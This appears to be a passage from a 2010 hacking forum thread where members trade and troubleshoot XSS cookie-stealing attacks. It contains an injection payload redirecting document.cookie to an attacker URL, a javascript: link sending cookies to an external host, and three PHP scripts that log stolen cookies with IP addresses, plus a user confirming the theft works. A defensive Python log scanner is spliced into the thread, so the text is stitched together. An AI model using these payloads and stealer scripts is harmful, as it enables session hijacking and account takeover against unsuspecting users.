The script that you are trying is wrong. Try this:
http:// w w w .victimsite.com/forums/search.php?query="><script>document.location="http ://yoursite.com/cookiestealer?c=" + document.cookie</script>
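The request in the post above, seen from the defending site's side, as an added example that is not part of the original thread: a Python scan of web-server access logs that flags query parameters carrying injected script markup, and ranks those that also read `document.cookie` higher. The log lines, the `collector.example` host and all function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines; addresses, paths and hosts are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jan/2010:10:40:01 +0000] "GET /forums/search.php?query=cookie+policy HTTP/1.1" 200 5120',
    '203.0.113.9 - - [15/Jan/2010:10:41:12 +0000] "GET /forums/search.php?query=%22%3E%3Cscript%3E'
    'document.location%3D%22http%3A%2F%2Fcollector.example%2Flog%3Fc%3D%22%2Bdocument.cookie'
    '%3C%2Fscript%3E HTTP/1.1" 200 5311',
    '203.0.113.8 - - [15/Jan/2010:10:43:55 +0000] "GET /forums/search.php?query=document.cookie+httponly HTTP/1.1" 200 4890',
    '203.0.113.12 - - [15/Jan/2010:10:44:20 +0000] "GET /forums/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5002',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r'<\s*script\b|javascript\s*:', re.I)   # injected script context
COOKIE = re.compile(r'document\s*\.\s*cookie', re.I)        # cookie-jar access

def normalize(value, rounds=3):
    """URL-decode until the text stops changing, so nested encodings compare equal."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return 'exfil', 'markup' or None for one query-parameter value."""
    text = normalize(value)
    if not MARKUP.search(text):
        return None        # plain text, even if it mentions document.cookie
    if COOKIE.search(text):
        return "exfil"     # injected markup that reads the cookie jar
    return "markup"        # injected markup without cookie access

def scan(lines):
    """Yield (client_ip, path, parameter, verdict) for each suspicious parameter."""
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            verdict = classify(value)
            if verdict:
                yield ip, url.path, name, verdict

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Log scanning only shows that such a request was made; the fix on the site itself is to HTML-encode the `query` value on output and to mark session cookies `HttpOnly` so page script cannot read them.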

Security Expert
15Jan2010,10:38 | #21

Contributor
15Jan2010,22:46 | #22

Thank you for your timely responses.
After using that code I am now getting the information and the cookie logged properly. However, the page still does not redirect. I am using Firefox 3.5.7; I don't know if that makes any difference.

Security Expert
15Jan2010,22:47 | #23

PM me with the info.

Contributor
17Jan2010,05:40 | #24

Turns out the issue is the host; the code works fine.

Go4Expert Member
16Feb2010,12:34 | #25

If I want to test this script on myself, what should I do? (Logging in to a forum, or testing it in Firefox or IE?)

Newbie Member
10Apr2010,18:47 | #26

Security Expert
10Apr2010,20:31 | #27

Newbie Member
11Apr2010,19:10 | #28

Newbie Member
26Jun2010,22:10 | #29

I don't understand something...
For example, if I put this code as an index page:
<a href="javascript:void(document.location='h t t p://tefutingat.net23.net/steal/steal.php?cookie='+ document.cookie)">Click Me</a>
and then send a PM to the victim to access the link tefutingat.net23.net/steal, will the script work? Note that the script will open the index page, and when the victim clicks "Click Me" the script will do its job. I guess I am doing something wrong, because none of them work. Below are the stealer scripts that I use:
HTML Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
HTML Code:
<?php
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}
function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();
    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");
    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
}
logData();
echo '<b>Page Under Construction</b>'
?>
HTML Code:
<?php
$cookie = $_GET['c'];
$ip = getenv (‘REMOTE_ADDR’);
$date=date(“j F, Y, g:i a”);;
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
header (“Location:TechMafias”);
?>

Contributor
26Jun2010,22:34 | #30

